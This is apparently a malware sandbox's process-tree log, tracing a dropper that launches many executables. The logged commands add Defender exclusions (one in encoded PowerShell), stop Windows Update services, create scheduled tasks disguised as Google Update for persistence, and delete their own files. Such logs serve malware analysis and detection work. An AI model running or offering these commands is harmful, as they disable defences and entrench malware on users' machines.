- - C:\Users\Admin\AppData\Local\Temp\a\trafico.exe
    "C:\Users\Admin\AppData\Local\Temp\a\trafico.exe"
    3⤵
    PID:4848
- - C:\Users\Admin\AppData\Local\Temp\a\htmlc.exe
    "C:\Users\Admin\AppData\Local\Temp\a\htmlc.exe"
    3⤵
    PID:5328
  - - C:\Users\Admin\AppData\Local\Temp\dslwsx.exe
      "C:\Users\Admin\AppData\Local\Temp\dslwsx.exe"
      4⤵
      PID:3852
    - - C:\Users\Admin\AppData\Local\Temp\dslwsx.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dslwsx.exe"
        5⤵
        
        PID:2864
- - C:\Users\Admin\AppData\Local\Temp\a\zoeg4a5.exe
    "C:\Users\Admin\AppData\Local\Temp\a\zoeg4a5.exe"
    3⤵
    PID:8456
- - C:\Users\Admin\AppData\Local\Temp\a\cllip.exe
    "C:\Users\Admin\AppData\Local\Temp\a\cllip.exe"
    3⤵
    PID:7824
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\s61c.0.bat" "
      4⤵
      PID:8844
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        5⤵
        Delays execution with timeout.exe
        
        PID:10056
    - - C:\ProgramData\presepuesto\LEAJ.exe
        
        "C:\ProgramData\presepuesto\LEAJ.exe"
        5⤵
        
        PID:3492
      - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 1 /RL HIGHEST /tn "LEAJ" /tr C:\ProgramData\presepuesto\LEAJ.exe /f
        6⤵
        Creates scheduled task(s)
        
        PID:9240
- - C:\Users\Admin\AppData\Local\Temp\a\audiodg.exe
    "C:\Users\Admin\AppData\Local\Temp\a\audiodg.exe"
    3⤵
    PID:9152
  - - C:\Users\Admin\AppData\Local\Temp\a\audiodg.exe
      "C:\Users\Admin\AppData\Local\Temp\a\audiodg.exe"
      4⤵
      PID:9464
  - - C:\Users\Admin\AppData\Local\Temp\a\audiodg.exe
      "C:\Users\Admin\AppData\Local\Temp\a\audiodg.exe"
      4⤵
      PID:9840
  - - C:\Users\Admin\AppData\Local\Temp\a\audiodg.exe
      "C:\Users\Admin\AppData\Local\Temp\a\audiodg.exe"
      4⤵
      PID:9740
  - - C:\Users\Admin\AppData\Local\Temp\a\audiodg.exe
      "C:\Users\Admin\AppData\Local\Temp\a\audiodg.exe"
      4⤵
      PID:9808
  - - C:\Users\Admin\AppData\Local\Temp\a\audiodg.exe
      "C:\Users\Admin\AppData\Local\Temp\a\audiodg.exe"
      4⤵
      PID:5668
- - C:\Users\Admin\AppData\Local\Temp\a\Tugksta.exe
    "C:\Users\Admin\AppData\Local\Temp\a\Tugksta.exe"
    3⤵
    PID:5988
  - - C:\Users\Admin\AppData\Local\Temp\a\Tugksta.exe
      C:\Users\Admin\AppData\Local\Temp\a\Tugksta.exe
      4⤵
      PID:7300
- - C:\Users\Admin\AppData\Local\Temp\a\putty.exe
    "C:\Users\Admin\AppData\Local\Temp\a\putty.exe"
    3⤵
    PID:8956
- - C:\Users\Admin\AppData\Local\Temp\a\EpPDrE.exe
    "C:\Users\Admin\AppData\Local\Temp\a\EpPDrE.exe"
    3⤵
    PID:7316
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
      4⤵
      PID:4024
- - C:\Users\Admin\AppData\Local\Temp\a\HTML.exe
    "C:\Users\Admin\AppData\Local\Temp\a\HTML.exe"
    3⤵
    PID:9692
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\movwXShFsgOqA" /XML "C:\Users\Admin\AppData\Local\Temp\tmp4931.tmp"
      4⤵
      Creates scheduled task(s)
      PID:6000
  - - C:\Users\Admin\AppData\Local\Temp\a\HTML.exe
      "{path}"
      4⤵
      PID:1260
- - C:\Users\Admin\AppData\Local\Temp\a\audiogse.exe
    "C:\Users\Admin\AppData\Local\Temp\a\audiogse.exe"
    3⤵
    PID:9248
  - - C:\Users\Admin\AppData\Local\Temp\dmnvd.exe
      "C:\Users\Admin\AppData\Local\Temp\dmnvd.exe"
      4⤵
      PID:9292
    - - C:\Users\Admin\AppData\Local\Temp\dmnvd.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dmnvd.exe"
        5⤵
        
        PID:9848
- - C:\Users\Admin\AppData\Local\Temp\a\mstsc.exe
    "C:\Users\Admin\AppData\Local\Temp\a\mstsc.exe"
    3⤵
    PID:6800
- - C:\Users\Admin\AppData\Local\Temp\a\3.exe
    "C:\Users\Admin\AppData\Local\Temp\a\3.exe"
    3⤵
    PID:3992
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
      4⤵
      PID:9576
- - C:\Users\Admin\AppData\Local\Temp\a\conhost.exe
    "C:\Users\Admin\AppData\Local\Temp\a\conhost.exe"
    3⤵
    PID:9992
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
      4⤵
      PID:8008
    - - C:\Windows\system32\mode.com
        
        mode 65,10
        5⤵
        
        PID:6984
    - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e file.zip -p985125742679522981943222763 -oextracted
        5⤵
        
        PID:8904
    - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e extracted/file_5.zip -oextracted
        5⤵
        
        PID:5668
    - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e extracted/file_4.zip -oextracted
        5⤵
        
        PID:10780
    - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e extracted/file_3.zip -oextracted
        5⤵
        
        PID:10048
    - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e extracted/file_2.zip -oextracted
        5⤵
        
        PID:4200
    - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e extracted/file_1.zip -oextracted
        5⤵
        
        PID:3296
    - - C:\Windows\system32\attrib.exe
        
        attrib +H "6dytfuygbftud5.exe"
        5⤵
        Views/modifies file attributes
        
        PID:10428
    - - C:\Users\Admin\AppData\Local\Temp\main\6dytfuygbftud5.exe
        
        "6dytfuygbftud5.exe"
        5⤵
        
        PID:5076
      - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /C powershell -EncodedCommand "PAAjAHEAcABDADkANwB4ADMAOABSACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYwB0AGQARABCAEIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdgB3ADMANgBSAEoAWQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAFcAZQBiADkAcwAjAD4A" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
        6⤵
        
        PID:5292
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -EncodedCommand "PAAjAHEAcABDADkANwB4ADMAOABSACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYwB0AGQARABCAEIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdgB3ADMANgBSAEoAWQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAFcAZQBiADkAcwAjAD4A"
        7⤵
        
        PID:11920
      - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk8476" /TR "C:\ProgramData\Dllhost\dllhost.exe"
        6⤵
        
        PID:11352
      - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
        6⤵
        
        PID:11384
- - C:\Users\Admin\AppData\Local\Temp\a\svchost.exe
    "C:\Users\Admin\AppData\Local\Temp\a\svchost.exe"
    3⤵
    PID:10216
- - C:\Users\Admin\AppData\Local\Temp\a\1.exe
    "C:\Users\Admin\AppData\Local\Temp\a\1.exe"
    3⤵
    PID:9664
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 9664 -s 764
      4⤵
      Program crash
      PID:1156
- - C:\Users\Admin\AppData\Local\Temp\a\bin.exe
    "C:\Users\Admin\AppData\Local\Temp\a\bin.exe"
    3⤵
    PID:10028
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
      4⤵
      PID:9952
- - C:\Users\Admin\AppData\Local\Temp\a\i.exe
    "C:\Users\Admin\AppData\Local\Temp\a\i.exe"
    3⤵
    PID:8236
- - C:\Users\Admin\AppData\Local\Temp\a\%40Natsu338_alice.exe
    "C:\Users\Admin\AppData\Local\Temp\a\%40Natsu338_alice.exe"
    3⤵
    PID:9488
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
      4⤵
      PID:10100
- - C:\Users\Admin\AppData\Local\Temp\a\info.exe
    "C:\Users\Admin\AppData\Local\Temp\a\info.exe"
    3⤵
    PID:8792
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
      4⤵
      PID:4108
- - C:\Users\Admin\AppData\Local\Temp\a\Msvsrlgkmzkynw.exe
    "C:\Users\Admin\AppData\Local\Temp\a\Msvsrlgkmzkynw.exe"
    3⤵
    PID:5096
- - C:\Users\Admin\AppData\Local\Temp\a\akjnagosfmwanr.exe
    "C:\Users\Admin\AppData\Local\Temp\a\akjnagosfmwanr.exe"
    3⤵
    PID:4568
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 1340
      4⤵
      Program crash
      PID:9260
- - C:\Users\Admin\AppData\Local\Temp\a\invoicedata.exe
    "C:\Users\Admin\AppData\Local\Temp\a\invoicedata.exe"
    3⤵
    PID:508
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
      4⤵
      PID:10080
  - - C:\Users\Admin\AppData\Local\Temp\ChromeClose12.exe
      "C:\Users\Admin\AppData\Local\Temp\ChromeClose12.exe"
      4⤵
      PID:5116
- - C:\Users\Admin\AppData\Local\Temp\a\netTime.exe
    "C:\Users\Admin\AppData\Local\Temp\a\netTime.exe"
    3⤵
    PID:6272
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpDCE1.tmp.bat""
      4⤵
      PID:10276
    - - C:\Windows\system32\timeout.exe
        
        timeout 3
        5⤵
        Delays execution with timeout.exe
        
        PID:10728
    - - C:\ProgramData\x64netJS\JQSZY.exe
        
        "C:\ProgramData\x64netJS\JQSZY.exe"
        5⤵
        
        PID:392
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "JQSZY" /tr "C:\ProgramData\x64netJS\JQSZY.exe"
        6⤵
        
        PID:7872
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "JQSZY" /tr "C:\ProgramData\x64netJS\JQSZY.exe"
        7⤵
        Creates scheduled task(s)
        
        PID:5296
- - C:\Users\Admin\AppData\Local\Temp\a\ed1.exe
    "C:\Users\Admin\AppData\Local\Temp\a\ed1.exe"
    3⤵
    PID:4496
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
      4⤵
      PID:5116
- C:\Windows\SysWOW64\wlanext.exe
  "C:\Windows\SysWOW64\wlanext.exe"
  2⤵
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  PID:4564
- - C:\Windows\SysWOW64\cmd.exe
    /c del "C:\Users\Admin\AppData\Local\Temp\ohtfjmxqk.exe"
    3⤵
    PID:2904
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  PID:5660
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /4
  2⤵
  PID:6324
- - C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /1
    3⤵
    PID:3972
  - - C:\Windows\system32\taskmgr.exe
      "C:\Windows\system32\taskmgr.exe" /1
      4⤵
      PID:5376
- - C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /1
    3⤵
    PID:5320
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  PID:5072
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  PID:5968
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:6024
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:7984
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:7368
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:5980
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:7784
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:6644
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:8136
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:7820
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:4616
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:8056
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:8612
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:8988
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:4616
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:8860
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:4708
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:8604
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:9024
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:5076
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:8412
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    PID:9172
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:7304
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    PID:5188
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:8952
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  PID:8520
- C:\Windows\SysWOW64\msdt.exe
  "C:\Windows\SysWOW64\msdt.exe"
  2⤵
  PID:9196
- - C:\Windows\SysWOW64\cmd.exe
    /c del "C:\Users\Admin\AppData\Local\Temp\a\owenzx.exe"
    3⤵
    PID:9104
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:8440
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    PID:9116
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:8948
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    PID:8720
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:5996
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:8056
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /create /f /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\yjkibfzfvbok.xml"
  2⤵
  - Creates scheduled task(s)
  PID:8928
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\a\yes.exe"
  2⤵
  PID:7592
- - C:\Windows\System32\choice.exe
    choice /C Y /N /D Y /T 3
    3⤵
    PID:9024
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:5188
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:5676
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    PID:4116
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:8604
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    PID:6104
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:6884
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:9044
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\iacrcjwhmdyc.xml"
  2⤵
  - Creates scheduled task(s)
  PID:6560
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:6056
- C:\Users\Admin\AppData\Local\Temp\AB69.exe
  C:\Users\Admin\AppData\Local\Temp\AB69.exe
  2⤵
  PID:5676
- - C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\jk8Ct2xS.exe
    C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\jk8Ct2xS.exe
    3⤵
    PID:8772
  - - C:\Users\Admin\AppData\Local\Temp\IXP010.TMP\UA1iT5yn.exe
      C:\Users\Admin\AppData\Local\Temp\IXP010.TMP\UA1iT5yn.exe
      4⤵
      PID:6400
    - - C:\Users\Admin\AppData\Local\Temp\IXP011.TMP\Ln0hF1AA.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP011.TMP\Ln0hF1AA.exe
        5⤵
        
        PID:6412
      - C:\Users\Admin\AppData\Local\Temp\IXP012.TMP\so6RE7tl.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP012.TMP\so6RE7tl.exe
        6⤵
        
        PID:9316
        
        C:\Users\Admin\AppData\Local\Temp\IXP013.TMP\1au16pV2.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP013.TMP\1au16pV2.exe
        7⤵
        
        PID:9792
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        8⤵
        
        PID:6532
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        8⤵
        
        PID:9116
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        8⤵
        
        PID:3256
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        8⤵
        
        PID:10204
        
        C:\Users\Admin\AppData\Local\Temp\IXP013.TMP\2xQ441rh.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP013.TMP\2xQ441rh.exe
        7⤵
        
        PID:5164
- C:\Users\Admin\AppData\Local\Temp\AD4E.exe
  C:\Users\Admin\AppData\Local\Temp\AD4E.exe
  2⤵
  PID:7504
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\B00E.bat" "
  2⤵
  PID:4876
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe"
    3⤵
    PID:5196
  - - C:\Program Files\Mozilla Firefox\Firefox.exe
      "C:\Program Files\Mozilla Firefox\Firefox.exe"
      4⤵
      PID:7716
- C:\Users\Admin\AppData\Local\Temp\C8E7.exe
  C:\Users\Admin\AppData\Local\Temp\C8E7.exe
  2⤵
  PID:7236
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:5884
- C:\Users\Admin\AppData\Local\Temp\CC34.exe
  C:\Users\Admin\AppData\Local\Temp\CC34.exe
  2⤵
  PID:6536
- C:\Users\Admin\AppData\Local\Temp\D06B.exe
  C:\Users\Admin\AppData\Local\Temp\D06B.exe
  2⤵
  PID:7112
- C:\Users\Admin\AppData\Local\Temp\D7BF.exe
  C:\Users\Admin\AppData\Local\Temp\D7BF.exe
  2⤵
  PID:6284
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  PID:1620
- C:\Users\Admin\AppData\Local\Temp\F3B4.exe
  C:\Users\Admin\AppData\Local\Temp\F3B4.exe
  2⤵
  PID:7764
- - C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
    "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
    3⤵
    PID:5664
  - - C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
      "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
      4⤵
      PID:6932
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  PID:4808
- C:\Users\Admin\AppData\Local\Temp\F7BC.exe
  C:\Users\Admin\AppData\Local\Temp\F7BC.exe
  2⤵
  PID:8860
- C:\Users\Admin\AppData\Local\Temp\F8C7.exe
  C:\Users\Admin\AppData\Local\Temp\F8C7.exe
  2⤵
  PID:8416
- C:\Users\Admin\AppData\Local\Temp\FB58.exe
  C:\Users\Admin\AppData\Local\Temp\FB58.exe
  2⤵
  PID:5452
- C:\Windows\system32\certreq.exe
  "C:\Windows\system32\certreq.exe"
  2⤵
  PID:9168
- C:\Users\Admin\AppData\Local\Temp\FDBA.exe
  C:\Users\Admin\AppData\Local\Temp\FDBA.exe
  2⤵
  PID:2560
- C:\Users\Admin\AppData\Local\Temp\D8.exe
  C:\Users\Admin\AppData\Local\Temp\D8.exe
  2⤵
  PID:6132
- C:\Users\Admin\AppData\Local\Temp\5DB.exe
  C:\Users\Admin\AppData\Local\Temp\5DB.exe
  2⤵
  PID:6228
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:6360
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    - Checks SCSI registry key(s)
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of WriteProcessMemory
    PID:2604
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:8728
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:7488
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:3920
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:7696
- C:\Users\Admin\AppData\Local\Temp\9E3.exe
  C:\Users\Admin\AppData\Local\Temp\9E3.exe
  2⤵
  PID:8928
- - C:\Windows\system32\rundll32.exe
    C:\Windows\system32\rundll32.exe dcfaafeabe.sys,#1
    3⤵
    PID:4612
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe dcfaafeabe.sys,#1
      4⤵
      PID:5652
- C:\Users\Admin\AppData\Local\Temp\D5E.exe
  C:\Users\Admin\AppData\Local\Temp\D5E.exe
  2⤵
  PID:5472
- C:\Users\Admin\AppData\Local\Temp\F63.exe
  C:\Users\Admin\AppData\Local\Temp\F63.exe
  2⤵
  PID:6632
- - C:\Users\Admin\AppData\Local\Temp\F63.exe
    C:\Users\Admin\AppData\Local\Temp\F63.exe
    3⤵
    PID:8060
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Users\Admin\AppData\Local\bb554dfd-6b68-4742-a92f-24738f74b556" /deny *S-1-1-0:(OI)(CI)(DE,DC)
      4⤵
      Modifies file permissions
      PID:8912
  - - C:\Users\Admin\AppData\Local\Temp\F63.exe
      "C:\Users\Admin\AppData\Local\Temp\F63.exe" --Admin IsNotAutoStart IsNotTask
      4⤵
      PID:7876
    - - C:\Users\Admin\AppData\Local\Temp\F63.exe
        
        "C:\Users\Admin\AppData\Local\Temp\F63.exe" --Admin IsNotAutoStart IsNotTask
        5⤵
        
        PID:4728
      - C:\Users\Admin\AppData\Local\a6b6cd67-e916-4067-8f32-24f7cce819a6\build2.exe
        
        "C:\Users\Admin\AppData\Local\a6b6cd67-e916-4067-8f32-24f7cce819a6\build2.exe"
        6⤵
        
        PID:7408
        
        C:\Users\Admin\AppData\Local\a6b6cd67-e916-4067-8f32-24f7cce819a6\build2.exe
        
        "C:\Users\Admin\AppData\Local\a6b6cd67-e916-4067-8f32-24f7cce819a6\build2.exe"
        7⤵
        
        PID:7524
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\a6b6cd67-e916-4067-8f32-24f7cce819a6\build2.exe" & exit
        8⤵
        
        PID:4100
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        9⤵
        Delays execution with timeout.exe
        
        PID:9956
      - C:\Users\Admin\AppData\Local\a6b6cd67-e916-4067-8f32-24f7cce819a6\build3.exe
        
